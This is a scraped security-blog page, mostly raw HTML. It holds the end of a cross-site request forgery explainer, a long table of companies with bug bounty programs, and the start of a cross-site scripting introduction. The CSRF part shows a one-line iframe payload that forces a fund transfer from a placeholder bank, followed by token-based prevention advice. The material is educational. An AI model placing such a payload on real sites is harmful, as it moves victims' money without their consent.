<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><span style="line-height: 18.2000007629395px;"><br /></span></span></span></div>
<div style="text-align: left;">
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><span style="line-height: 18.2000007629395px;">To transfer funds to some account say 98765, I need to send a GET request to </span></span></span><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">http://abcdbank.com/transferFunds?amount=1000&destinationAccount=98765, this normally happens  </span><br /><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">Now let’s say I happen to visit www.malicioussite.com. </span><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">It just so happens that this site is trying to attack people who bank with www.abcdbank.com and has set up a CSRF attack on its site. The attack will transfer $1,000 to account number 12345. Somewhere on www.malicioussite.com, attackers have added this line of code: </span></div>
<div style="text-align: left;">
<span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;"><iframe src="http://abcdbank.com/transferFunds?amount=100&destinationAccount=12345></span><br /><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">Upon loading that iframe, my browser will send that request to www.abcdbank.com, which my browser has already logged in as me. The request will be processed and send $1,000 to account 12345.</span></div>
<div style="text-align: left;">
<span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;"><br /></span></div>
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><b>Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities</b></span></span><br />
<br />
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;">To prevent Cross-Site Request Forgery (CSRF) attacks append unpredictable challenge tokens to each request and associate them with the user’s session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from a source other than the user.</span></span></div>

Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) is an attack where an attacker sends requests from malicious website to a target web application that a user is already authenticated. This way an attacker can acces…

04 Jun 2015

List of Bug Bounty Programs

<div dir="ltr" style="text-align: left;" trbidi="on">
<center>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: red;"><b>The below is the list of companies offering bug bounty programme
</b></span><style type="text/css">
 table.tableizer-table {
 border: 1px solid #CCC; font-family: Arial, Helvetica, sans-serif;
 font-size: 12px;
} 
.tableizer-table td {
 padding: 4px;
 margin: 3px;
 border: 1px solid #ccc;
}
.tableizer-table th {
 background-color: #104E8B; 
 color: #FFF;
 font-weight: bold;
}
</style><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIKkOVI3IgyHIfcf48MArRjBxrMFRxOx2Q2YlOoXb8BXypZwkuD44-1-VQ30UY2J4mHV04tD2xnzKTIBa_OBj6ob7sP3UGnWFX72UvmK37v9gAYmoTN0P6qcr7xRlc-rhKmyMQYCmv_NL9/s1600/Bug+bounty+Program+By+cyberkendra.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIKkOVI3IgyHIfcf48MArRjBxrMFRxOx2Q2YlOoXb8BXypZwkuD44-1-VQ30UY2J4mHV04tD2xnzKTIBa_OBj6ob7sP3UGnWFX72UvmK37v9gAYmoTN0P6qcr7xRlc-rhKmyMQYCmv_NL9/s320/Bug+bounty+Program+By+cyberkendra.png" width="320" /></a></div>
<span style="color: red;"><b><br /></b></span></div>
<table class="tableizer-table">
<tbody>
<tr class="tableizer-firstrow"><th>COMPANY</th><th>BUG BOUNTY & REWARDS</th><th>SWAG</th><th>HALL OF FAME</th></tr>
<tr><td>123 Contact Form</td><td></td><td></td><td>✔</td></tr>
<tr><td>99Designs</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Abacus</td><td></td><td></td><td>✔</td></tr>
<tr><td>Acquia</td><td></td><td></td><td>✔</td></tr>
<tr><td>Active Campaign</td><td></td><td></td><td>✔</td></tr>
<tr><td>ActiveProspect</td><td></td><td></td><td>✔</td></tr>
<tr><td>ActiVPN</td><td></td><td></td><td>✔</td></tr>
<tr><td>Adapcare</td><td></td><td>✔</td><td></td></tr>
<tr><td>Adobe</td><td></td><td></td><td>✔</td></tr>
<tr><td>AeroFS</td><td></td><td></td><td>✔</td></tr>
<tr><td>Aerohive</td><td></td><td>✔</td><td></td></tr>
<tr><td>Agora Ciudadana Security</td><td></td><td></td><td>✔</td></tr>
<tr><td>Airbnb</td><td></td><td>✔</td><td></td></tr>
<tr><td>Alcyon</td><td></td><td>✔</td><td></td></tr>
<tr><td>Altervista</td><td></td><td></td><td>✔</td></tr>
<tr><td>Amazon Web Services</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>ANCILE Solutions Inc.</td><td></td><td></td><td>✔</td></tr>
<tr><td>Android Free Apps</td><td></td><td></td><td>✔</td></tr>
<tr><td>Aptible</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Appcelerator</td><td></td><td></td><td>✔</td></tr>
<tr><td>Apple</td><td></td><td></td><td>✔</td></tr>
<tr><td>Apptentive</td><td></td><td>✔</td><td></td></tr>
<tr><td>Asana</td><td>✔</td><td></td><td></td></tr>
<tr><td>Atlas</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>AT&T Corporation </td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>Attack Secure</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Automattic Security</td><td></td><td></td><td>✔</td></tr>
<tr><td>Avast! - 2014 AntiVirus </td><td>✔</td><td></td><td></td></tr>
<tr><td>Avira</td><td></td><td></td><td>✔</td></tr>
<tr><td>Badoo</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Barracuda Networks </td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Base</td><td></td><td></td><td>✔</td></tr>
<tr><td>Basecamp</td><td></td><td></td><td>✔</td></tr>
<tr><td>BattleNET EU </td><td></td><td>✔</td><td></td></tr>
<tr><td>Beanstalk</td><td></td><td></td><td>✔</td></tr>
<tr><td>BeSnappy</td><td></td><td></td><td>✔</td></tr>
<tr><td>Bitcasa</td><td></td><td></td><td>✔</td></tr>
<tr><td>Bitcoin.DE</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Bittrex</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>BitWall</td><td></td><td></td><td>✔</td></tr>
<tr><td>Blackberry</td><td></td><td></td><td>✔</td></tr>
<tr><td>Blackboard</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>BlinkSale</td><td></td><td></td><td>✔</td></tr>
<tr><td>Blogger</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Box</td><td></td><td></td><td>✔</td></tr>
<tr><td>Braintree</td><td></td><td></td><td>✔</td></tr>
<tr><td>BTX Trader</td><td>✔</td><td></td><td></td></tr>
<tr><td>BudgetSimple</td><td>✔</td><td></td><td></td></tr>
<tr><td>Buffer</td><td></td><td></td><td>✔</td></tr>
<tr><td>C2FO</td><td></td><td></td><td>✔</td></tr>
<tr><td>Campaign Monitor</td><td></td><td>✔</td><td></td></tr>
<tr><td>Can you XSS this?</td><td></td><td></td><td>✔</td></tr>
<tr><td>Card</td><td></td><td></td><td>✔</td></tr>
<tr><td>Chain API</td><td></td><td></td><td>✔</td></tr>
<tr><td>Chargify</td><td></td><td></td><td>✔</td></tr>
<tr><td>Chromium Project</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>CircleCi</td><td></td><td>✔</td><td></td></tr>
<tr><td>Cisco</td><td></td><td></td><td>✔</td></tr>
<tr><td>Code Climate</td><td></td><td></td><td>✔</td></tr>
<tr><td>Codex Wordpress </td><td></td><td></td><td>✔</td></tr>
<tr><td>CodePen</td><td></td><td></td><td>✔</td></tr>
<tr><td>Coinbase</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Coindrawer</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Coinkite</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Colupon</td><td></td><td></td><td>✔</td></tr>
<tr><td>Commonsware</td><td></td><td>✔</td><td></td></tr>
<tr><td>Compilr</td><td></td><td></td><td>✔</td></tr>
<tr><td>Constant Contact</td><td></td><td></td><td>✔</td></tr>
<tr><td>Counterparty</td><td>✔</td><td></td><td></td></tr>
<tr><td>Coupa</td><td></td><td></td><td>✔</td></tr>
<tr><td>CPanel</td><td>✔</td><td></td><td></td></tr>
<tr><td>cPaperless</td><td></td><td></td><td>✔</td></tr>
<tr><td>Cryptocat</td><td></td><td></td><td>✔</td></tr>
<tr><td>Cupcake</td><td></td><td></td><td>✔</td></tr>
<tr><td>Customer Insight</td><td></td><td></td><td></td></tr>
<tr><td>Debian Security Tracker</td><td></td><td></td><td>✔</td></tr>
<tr><td>Dell Secureworks</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Detectify</td><td></td><td></td><td>✔</td></tr>
<tr><td>Deutsche Telekom</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Digital Ocean</td><td></td><td></td><td>✔</td></tr>
<tr><td>DNN Corporation</td><td></td><td></td><td>✔</td></tr>
<tr><td>DNSimple</td><td></td><td></td><td>✔</td></tr>
<tr><td>Donately (API)</td><td></td><td></td><td>✔</td></tr>
<tr><td>Downstream Analytics</td><td></td><td>✔</td><td></td></tr>
<tr><td>Dribbble</td><td></td><td></td><td>✔</td></tr>
<tr><td>Dropbox</td><td></td><td></td><td>✔</td></tr>
<tr><td>Dropcam</td><td></td><td></td><td>✔</td></tr>
<tr><td>Dropmyemail</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Drupal</td><td></td><td></td><td>✔</td></tr>
<tr><td>eBay</td><td></td><td></td><td>✔</td></tr>
<tr><td>Eclipse</td><td></td><td>✔</td><td></td></tr>
<tr><td>eFront eLearning CMS</td><td></td><td></td><td>✔</td></tr>
<tr><td>Electronic Arts (Games)</td><td></td><td>✔</td><td></td></tr>
<tr><td>EMC2</td><td></td><td></td><td>✔</td></tr>
<tr><td>Emptrust</td><td></td><td></td><td>✔</td></tr>
<tr><td>Engineyard</td><td></td><td></td><td>✔</td></tr>
<tr><td>EthnoHub</td><td></td><td>✔</td><td></td></tr>
<tr><td>Etsy</td><td>✔</td><td></td><td></td></tr>
<tr><td>Eventbrite</td><td></td><td></td><td>✔</td></tr>
<tr><td>Event Espresso</td><td></td><td></td><td>✔</td></tr>
<tr><td>Evernote</td><td></td><td></td><td>✔</td></tr>
<tr><td>Expatistan</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Facebook WhiteHat </td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>FastMail Pty Ltd.</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>FFmpeg</td><td></td><td></td><td>✔</td></tr>
<tr><td>Flowdock</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Fluxiom</td><td></td><td></td><td>✔</td></tr>
<tr><td>Fog Creek </td><td></td><td></td><td>✔</td></tr>
<tr><td>Form Assembly</td><td></td><td></td><td>✔</td></tr>
<tr><td>Foursquare</td><td></td><td></td><td>✔</td></tr>
<tr><td>Foxycart</td><td></td><td></td><td>✔</td></tr>
<tr><td>Freelancer</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Gallery</td><td>✔</td><td></td><td></td></tr>
<tr><td>Gamma</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Gemeente Wageningen</td><td></td><td></td><td>✔</td></tr>
<tr><td>Gemfury</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>GetClouder</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Ghost</td><td></td><td></td><td></td></tr>
<tr><td>Ghostscript</td><td>✔</td><td></td><td></td></tr>
<tr><td>Giftcards.com</td><td></td><td></td><td>✔</td></tr>
<tr><td>Github</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Gimp</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Gitlab</td><td></td><td></td><td>✔</td></tr>
<tr><td>Gittip</td><td></td><td></td><td>✔</td></tr>
<tr><td>Gliph</td><td></td><td></td><td>✔</td></tr>
<tr><td>GoAnimate</td><td></td><td></td><td>✔</td></tr>
<tr><td>Google</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Greenhouse Software Inc</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Grok Learning</td><td></td><td></td><td>✔</td></tr>
<tr><td>Hack For Cause</td><td></td><td></td><td>✔</td></tr>
<tr><td>HakSecurity</td><td></td><td></td><td>✔</td></tr>
<tr><td>Harmony</td><td></td><td></td><td>✔</td></tr>
<tr><td>Helpscout</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Heroku</td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>Hex-Rays</td><td>✔</td><td></td><td></td></tr>
<tr><td>HoneyDocs</td><td></td><td></td><td>✔</td></tr>
<tr><td>Honeywell</td><td></td><td></td><td>✔</td></tr>
<tr><td>Hootsuite</td><td></td><td></td><td>✔</td></tr>
<tr><td>HTC</td><td></td><td></td><td>✔</td></tr>
<tr><td>Huawei</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Hybrid Saas</td><td>✔</td><td></td><td></td></tr>
<tr><td>IBM</td><td></td><td></td><td>✔</td></tr>
<tr><td>ICEcoder</td><td></td><td>✔</td><td></td></tr>
<tr><td>Iconfinder</td><td></td><td></td><td>✔</td></tr>
<tr><td>ifixit</td><td></td><td></td><td>✔</td></tr>
<tr><td>Indeed</td><td></td><td></td><td>✔</td></tr>
<tr><td>Informatiebeveiliging</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>ING NL</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Instagram</td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>IntegraXor (SCADA)</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Internetwache</td><td></td><td></td><td>✔</td></tr>
<tr><td>ITRP</td><td></td><td></td><td>✔</td></tr>
<tr><td>Jetendo</td><td></td><td></td><td>✔</td></tr>
<tr><td>Joomla</td><td></td><td></td><td>✔</td></tr>
<tr><td>jruby</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Juniper</td><td></td><td></td><td>✔</td></tr>
<tr><td>Kadince</td><td></td><td></td><td></td></tr>
<tr><td>Kaneva</td><td></td><td></td><td>✔</td></tr>
<tr><td>Kayako</td><td></td><td></td><td>✔</td></tr>
<tr><td>Keming Labs</td><td></td><td></td><td>✔</td></tr>
<tr><td>Kentico</td><td></td><td></td><td>✔</td></tr>
<tr><td>Keepass</td><td></td><td></td><td>✔</td></tr>
<tr><td>KPN</td><td></td><td></td><td>✔</td></tr>
<tr><td>Kraken</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>lastpass</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>LaunchKey</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Librato</td><td></td><td></td><td>✔</td></tr>
<tr><td>Lievensberg Hospital</td><td></td><td></td><td>✔</td></tr>
<tr><td>Liferay</td><td></td><td></td><td>✔</td></tr>
<tr><td>LinkedIn</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Logentries</td><td></td><td></td><td>✔</td></tr>
<tr><td>Localize</td><td></td><td></td><td>✔</td></tr>
<tr><td>Lookout</td><td></td><td></td><td>✔</td></tr>
<tr><td>MacOSX Bitcoin LevelDB</td><td>✔</td><td></td><td></td></tr>
<tr><td>Magento (Ebay Inc) </td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Magix AG</td><td></td><td></td><td>✔</td></tr>
<tr><td>Mahara</td><td></td><td></td><td>✔</td></tr>
<tr><td>MailChimp</td><td></td><td></td><td>✔</td></tr>
<tr><td>ManageWP</td><td></td><td></td><td>✔</td></tr>
<tr><td>Mandrill App</td><td></td><td></td><td>✔</td></tr>
<tr><td>Marktplaats</td><td>✔</td><td></td><td></td></tr>
<tr><td>MasterCoin (+Tools)</td><td></td><td></td><td>✔</td></tr>
<tr><td>MC-ProHosting </td><td></td><td></td><td>✔</td></tr>
<tr><td>MediaWiki</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Medium</td><td></td><td></td><td>✔</td></tr>
<tr><td>Mega.co.nz</td><td>✔</td><td></td><td></td></tr>
<tr><td>MeinVZ (Report)</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Meldium</td><td></td><td></td><td>✔</td></tr>
<tr><td>Meraki</td><td>✔</td><td></td><td></td></tr>
<tr><td>Meta Calculator</td><td>✔</td><td></td><td></td></tr>
<tr><td>Microsoft Bug Bounty </td><td>✔</td><td></td><td></td></tr>
<tr><td>Microsoft (MSRC) </td><td></td><td></td><td>✔</td></tr>
<tr><td>Millsap Independent School</td><td></td><td></td><td>✔</td></tr>
<tr><td>Modus CSR</td><td></td><td>✔</td><td></td></tr>
<tr><td>Moneybird</td><td></td><td></td><td>✔</td></tr>
<tr><td>Moodle</td><td></td><td></td><td>✔</td></tr>
<tr><td>Motorola</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Mozilla</td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>Myntra</td><td></td><td></td><td>✔</td></tr>
<tr><td>MyStuff2 App</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Namazu</td><td></td><td></td><td>✔</td></tr>
<tr><td>NCSC Netherlands</td><td>✔</td><td>✔</td><td></td></tr>
<tr><td>Netagio</td><td>✔</td><td></td><td></td></tr>
<tr><td>Netflix</td><td></td><td></td><td>✔</td></tr>
<tr><td>Net Worth Pro</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Nitrous.IO</td><td></td><td></td><td>✔</td></tr>
<tr><td>Nokia Siemens Networks</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Norada</td><td></td><td></td><td>✔</td></tr>
<tr><td>Nokia Solutions Networks</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Nvidia</td><td></td><td>✔</td><td></td></tr>
<tr><td>NZRS</td><td></td><td></td><td>✔</td></tr>
<tr><td>Oculus VR</td><td></td><td></td><td>✔</td></tr>
<tr><td>Offensive Security</td><td>✔</td><td>✔</td><td></td></tr>
<tr><td>Offers.com</td><td></td><td>✔</td><td></td></tr>
<tr><td>Olark</td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>Onavo</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>OnePageCRM</td><td></td><td></td><td>✔</td></tr>
<tr><td>OpenBSD</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Openclass Knowledge Base</td><td></td><td></td><td>✔</td></tr>
<tr><td>OpenText</td><td></td><td></td><td>✔</td></tr>
<tr><td>Open Office </td><td></td><td></td><td>✔</td></tr>
<tr><td>Opera</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Oracle</td><td></td><td></td><td>✔</td></tr>
<tr><td>Orkut</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Own Cloud </td><td></td><td></td><td>✔</td></tr>
<tr><td>PacketStorm Security</td><td>✔</td><td>✔</td><td></td></tr>
<tr><td>PagerDuty</td><td></td><td></td><td>✔</td></tr>
<tr><td>Pantheon</td><td></td><td>✔</td><td></td></tr>
<tr><td>Panzura</td><td></td><td></td><td>✔</td></tr>
<tr><td>Parley</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Parse (Facebook) </td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Paychoice</td><td></td><td></td><td>✔</td></tr>
<tr><td>Paymill</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Paypal Inc </td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>Pidgin</td><td>✔</td><td></td><td></td></tr>
<tr><td>PikaPay</td><td></td><td></td><td>✔</td></tr>
<tr><td>Pinoy Hack News</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Pinterest</td><td>✔</td><td></td><td></td></tr>
<tr><td>Piwik</td><td></td><td></td><td>✔</td></tr>
<tr><td>Plone Framework </td><td></td><td></td><td>✔</td></tr>
<tr><td>Pocket</td><td>✔</td><td></td><td></td></tr>
<tr><td>Polar SSL</td><td></td><td></td><td>✔</td></tr>
<tr><td>PostmarkApp</td><td>✔</td><td></td><td></td></tr>
<tr><td>Prezi</td><td>✔</td><td></td><td></td></tr>
<tr><td>PullReview</td><td></td><td></td><td>✔</td></tr>
<tr><td>Puppet Labs</td><td>✔</td><td></td><td></td></tr>
<tr><td>PureVPN</td><td>✔</td><td></td><td></td></tr>
<tr><td>Qiwi</td><td>✔</td><td></td><td></td></tr>
<tr><td>Qmail</td><td></td><td></td><td>✔</td></tr>
<tr><td>Rackspace</td><td></td><td></td><td>✔</td></tr>
<tr><td>Redaxo</td><td></td><td></td><td>✔</td></tr>
<tr><td>Reddit</td><td></td><td></td><td>✔</td></tr>
<tr><td>RedHat</td><td>✔</td><td></td><td></td></tr>
<tr><td>Regiobank NL</td><td></td><td></td><td></td></tr>
<tr><td>Relaso</td><td></td><td></td><td>✔</td></tr>
<tr><td>Ribose</td><td>✔</td><td></td><td></td></tr>
<tr><td>Ripple</td><td></td><td></td><td>✔</td></tr>
<tr><td>Riskalyze</td><td></td><td>✔</td><td></td></tr>
<tr><td>Risk.io</td><td>✔</td><td></td><td></td></tr>
<tr><td>Ruby Language</td><td></td><td></td><td>✔</td></tr>
<tr><td>Salesforce</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Samba</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Samsung</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>SBWire</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Schuberg Philis</td><td></td><td></td><td>✔</td></tr>
<tr><td>Scorpion Software</td><td></td><td></td><td>✔</td></tr>
<tr><td>Security Net</td><td></td><td></td><td>✔</td></tr>
<tr><td>Segment.io</td><td></td><td></td><td>✔</td></tr>
<tr><td>Sellfy</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Shopify</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Sifter</td><td></td><td></td><td>✔</td></tr>
<tr><td>Simple</td><td></td><td></td><td>✔</td></tr>
<tr><td>Simplify</td><td></td><td></td><td>✔</td></tr>
<tr><td>SiteGround</td><td></td><td></td><td>✔</td></tr>
<tr><td>Skoodat</td><td></td><td></td><td>✔</td></tr>
<tr><td>Skuid</td><td></td><td></td><td>✔</td></tr>
<tr><td>Smart Budget</td><td>✔</td><td></td><td></td></tr>
<tr><td>Smileznhapiez</td><td></td><td></td><td>✔</td></tr>
<tr><td>SNS Bank NL</td><td></td><td></td><td>✔</td></tr>
<tr><td>Sonatype</td><td></td><td></td><td>✔</td></tr>
<tr><td>SonicWall (DELL)</td><td></td><td></td><td>✔</td></tr>
<tr><td>Sony</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Soundcloud</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>SplashID</td><td></td><td></td><td>✔</td></tr>
<tr><td>Splitwise</td><td></td><td></td><td>✔</td></tr>
<tr><td>Splunk</td><td></td><td>✔</td><td></td></tr>
<tr><td>Spotify</td><td></td><td></td><td>✔</td></tr>
<tr><td>Sprout Social</td><td></td><td></td><td>✔</td></tr>
<tr><td>Square</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>StatusPage</td><td></td><td></td><td>✔</td></tr>
<tr><td>StreemFire</td><td></td><td></td><td>✔</td></tr>
<tr><td>StudiVZ (Report)</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Symantec</td><td>✔</td><td></td><td></td></tr>
<tr><td>TapaTalk</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Tarsnap</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Team Unify</td><td></td><td></td><td>✔</td></tr>
<tr><td>Tele2</td><td>✔</td><td></td><td></td></tr>
<tr><td>Telegram</td><td></td><td></td><td>✔</td></tr>
<tr><td>Tesla</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Trade Only</td><td>✔</td><td></td><td></td></tr>
<tr><td>Trend Micro & (Beta Portal) </td><td></td><td></td><td>✔</td></tr>
<tr><td>Tresorit</td><td></td><td></td><td>✔</td></tr>
<tr><td>Tuenti</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Tumblr</td><td></td><td></td><td>✔</td></tr>
<tr><td>Twilio</td><td></td><td></td><td>✔</td></tr>
<tr><td>Twitch Interactive</td><td></td><td></td><td>✔</td></tr>
<tr><td>Twitter</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Typo3</td><td></td><td></td><td>✔</td></tr>
<tr><td>Uber</td><td></td><td></td><td>✔</td></tr>
<tr><td>Unitag</td><td></td><td></td><td>✔</td></tr>
<tr><td>UPC</td><td></td><td></td><td>✔</td></tr>
<tr><td>Valve</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>VCE</td><td></td><td></td><td>✔</td></tr>
<tr><td>Viadeo</td><td></td><td></td><td>✔</td></tr>
<tr><td>Vodafone Security NL </td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Vodafone Security DE </td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Volcanic Pixels</td><td></td><td></td><td>✔</td></tr>
<tr><td>VSR</td><td></td><td></td><td>✔</td></tr>
<tr><td>Wamba</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Webconverger</td><td>✔</td><td></td><td></td></tr>
<tr><td>Web GUI </td><td></td><td></td><td>✔</td></tr>
<tr><td>WebsiteBaker</td><td></td><td></td><td>✔</td></tr>
<tr><td>Wickr</td><td>✔</td><td>✔</td><td>✔</td></tr>
<tr><td>Windthorst ISD</td><td></td><td></td><td></td></tr>
<tr><td>X.com</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Xen</td><td></td><td></td><td>✔</td></tr>
<tr><td>XING (Social Network)</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Xmarks</td><td>✔</td><td></td><td></td></tr>
<tr><td>XMind</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Yahoo!</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>Yandex</td><td></td><td></td><td>✔</td></tr>
<tr><td>Yesware</td><td>✔</td><td></td><td>✔</td></tr>
<tr><td>YouTube</td><td></td><td></td><td>✔</td></tr>
<tr><td>Zencash</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Zendesk</td><td>✔</td><td></td><td></td></tr>
<tr><td>Zerobrane</td><td></td><td></td><td>✔</td></tr>
<tr><td>Zetetic</td><td></td><td>✔</td><td></td></tr>
<tr><td>Ziggo</td><td></td><td></td><td>✔</td></tr>
<tr><td>Zimbra</td><td></td><td>✔</td><td>✔</td></tr>
<tr><td>Zynga</td><td></td><td></td><td>✔</td></tr>
</tbody></table>
<br /></div>
</center>
</div>

List of Bug Bounty Programs

The below is the list of companies offering bug bounty programme table.tableizer-table { border: 1px solid #CCC; font-family: Arial, Helvetica, sans-serif; font-size: 12px; } .tableizer-table td …

04 Jun 2015

Cross Site Scripting

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtBlcFTsiMSvQCluglZdhoukc81iBbMsCtKF1arwHhr8DJgj3kK6otFBuo7BgOzsDyac14okVMWoYhYcnKoHSH4ktP9Y0SHfztjdfxbvwhxqR-zcxo1m1aerya4vlLXSCIy_5teyAjb8Ut/s1600/cross.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtBlcFTsiMSvQCluglZdhoukc81iBbMsCtKF1arwHhr8DJgj3kK6otFBuo7BgOzsDyac14okVMWoYhYcnKoHSH4ktP9Y0SHfztjdfxbvwhxqR-zcxo1m1aerya4vlLXSCIy_5teyAjb8Ut/s320/cross.png" width="320" /></a></div>
<br />
<div>
<br /></div>
<div>
<div>
Introduction</div>
<div>
Cross-Site Scripting stems from a lack of encoding when information gets sent to application's users. This can be used to inject arbitrary HTML and JavaScript; the result being that this payload runs in the web browser of legitimate users. As opposed to other attacks, XSS vulnerabilities target an application's users, instead of directly targeting the server.</div>
</div>
<div>
Types of XSS</div>
<div>
1.</div>
<div>
<br /></div>
<div>
<div>
Reflective XSS</div>
<div>
There are many ways in which an attacker can entice a victim into initiating a reflective XSS request. For example, the attacker could send the victim a misleading email with a link containing malicious JavaScript. If the victim clicks on the link, the HTTP request is initiated from the victim's browser and sent to the vulnerable Web application. The malicious JavaScript is then reflected back to the victim's browser, where it is executed in the context of the victim user's session. </div>
</div>
